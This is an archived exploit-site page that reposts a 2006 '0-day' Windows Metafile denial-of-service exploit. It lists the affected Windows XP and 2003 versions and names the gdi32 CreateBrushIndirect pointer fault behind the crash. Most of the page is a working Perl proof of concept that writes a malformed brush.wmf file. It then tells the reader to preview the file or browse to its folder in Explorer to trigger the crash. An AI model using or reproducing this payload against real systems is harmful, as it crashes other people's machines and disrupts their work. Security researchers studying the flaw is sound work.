AOH :: HP Unsorted X :: B06-4064.HTM

XP SP2 wmf exploit
0-day XP SP2 wmf exploit
0-day XP SP2 wmf exploit


yet another 'windows meta file' (WMF) denial of service exploit.

System affected:

+ Windows XP SP2,
+ Windows 2003 SP1,
+ Windows XP SP1,
+ Windows XP
+ Windows 2003

Tech info:

page fault in gdi32!CreateBrushIndirect() because invalid pointer access.
Incorrect (short) to (void*) sign extension also present.


=== begin of ==#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E "; 
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";
=== end of ==
Just run and try to preview brush.wmf (or even browse folder
with brush.wmf in windows explorer).


06/24/2006; vendor informed but not answered

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH
We do not send spam. If you have received spam bearing an email address, please forward it with full headers to